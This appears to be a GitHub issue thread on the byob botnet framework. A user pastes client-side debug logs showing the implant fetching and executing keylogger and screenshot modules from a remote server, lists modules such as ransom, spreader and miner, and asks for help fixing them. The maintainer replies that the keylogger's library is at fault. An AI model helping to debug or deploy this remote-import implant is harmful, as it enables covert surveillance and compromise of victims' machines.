### ISSUE TITLE
keyloader don't work

### ISSUE THREAD

**Issue by 141801** [malwaredllc/byob#84]
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: keylogger
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:Checking if built-in....
INFO:__main__:Checking if it is name repetition... 
INFO:__main__:[+] Module/Package 'keylogger' can be loaded!
DEBUG:__main__:LOADER=================
DEBUG:__main__:Loading keylogger...
DEBUG:__main__:Trying to import 'keylogger' as package from: 'http://35.243.70.37:1338/keylogger/__init__.py'
INFO:__main__:[-] 'keylogger' is not a package (HTTP Error 404: File not found)
DEBUG:__main__:[+] Trying to import 'keylogger' as module from: 'http://35.243.70.37:1338/keylogger.py'
DEBUG:__main__:[+] Importing 'keylogger'
DEBUG:__main__:[+] Ready to execute 'keylogger' code
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:load error: No module named pyxhook
DEBUG:__main__:run error: 'keylogger'
DEBUG:__main__:[+] keylogger remotely imported
DEBUG:__main__:run error: 'module' object has no attribute 'usage'

     Then I pre install pyxhook on then client size manually ,  but error also occurs

DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: keylogger
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:Checking if built-in....
INFO:__main__:Checking if it is name repetition... 
INFO:__main__:[+] Module/Package 'keylogger' can be loaded!
DEBUG:__main__:LOADER=================
DEBUG:__main__:Loading keylogger...
DEBUG:__main__:Trying to import 'keylogger' as package from: 'http://35.243.70.37:1338/keylogger/__init__.py'
INFO:__main__:[-] 'keylogger' is not a package (HTTP Error 404: File not found)
DEBUG:__main__:[+] Trying to import 'keylogger' as module from: 'http://35.243.70.37:1338/keylogger.py'
DEBUG:__main__:[+] Importing 'keylogger'
DEBUG:__main__:[+] Ready to execute 'keylogger' code
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.pyxhook
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.pyxhook
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.__future__
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.__future__
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.sys
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.sys
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.re
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.re
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.time
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.time
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.threading
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.threading
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.Xlib
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: pyxhook.Xlib
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/pyxhook']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.X
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.X
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.XK
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.XK
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.Xlib
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.Xlib
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.keysymdef
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.keysymdef
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.keysymdef.miscellany
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib/keysymdef']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.keysymdef.miscellany
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib/keysymdef']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.keysymdef.latin1
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib/keysymdef']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.keysymdef.latin1
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib/keysymdef']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.display
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.display
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.types
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.types
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.six
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: Xlib.six
DEBUG:__main__:Path: ['/var/root/Library/Python/2.7/lib/python/site-packages/Xlib']
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: six
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: six
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:Checking if built-in....
INFO:__main__:[-] Found locally!
DEBUG:__main__:load error: cannot import name create_unbound_method
DEBUG:__main__:run error: 'keylogger'

I have another  question :
 Is it needed to manually pre install the modules which Is needed

**Comment by 141801** [comment]
screenshot also don't work 
I just ran reverse TCP command 
 [ 1 @ /Users/apple/Downloads/byob-master/byob ]>screenshot ftp
and log as follows on the client side
--------------------------------
 "modules": [
    "escalate", 
    "icloud", 
    "keylogger", 
    "miner", 
    "outlook", 
    "packetsniffer", 
    "persistence", 
    "phone", 
    "portscanner", 
    "process", 
    "ransom", 
    "screenshot", 
    "spreader", 
    "util", 
    "webcam"
  ]
}
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: screenshot
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:Checking if built-in....
INFO:__main__:Checking if it is name repetition... 
INFO:__main__:[+] Module/Package 'screenshot' can be loaded!
DEBUG:__main__:LOADER=================
DEBUG:__main__:Loading screenshot...
DEBUG:__main__:Trying to import 'screenshot' as package from: 'http://35.243.70.37:1338/screenshot/__init__.py'
INFO:__main__:[-] 'screenshot' is not a package (HTTP Error 404: File not found)
DEBUG:__main__:[+] Trying to import 'screenshot' as module from: 'http://35.243.70.37:1338/screenshot.py'
DEBUG:__main__:[+] Importing 'screenshot'
DEBUG:__main__:[+] Ready to execute 'screenshot' code
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: mss
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: mss
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:[-] Not found!
DEBUG:__main__:load error: No module named mss
DEBUG:__main__:screenshot error: 'screenshot'

**Comment by malwaredllc** [comment]
There seems to be an issue with the underlying library (pyHook) used by the keylogger. I will look into this.
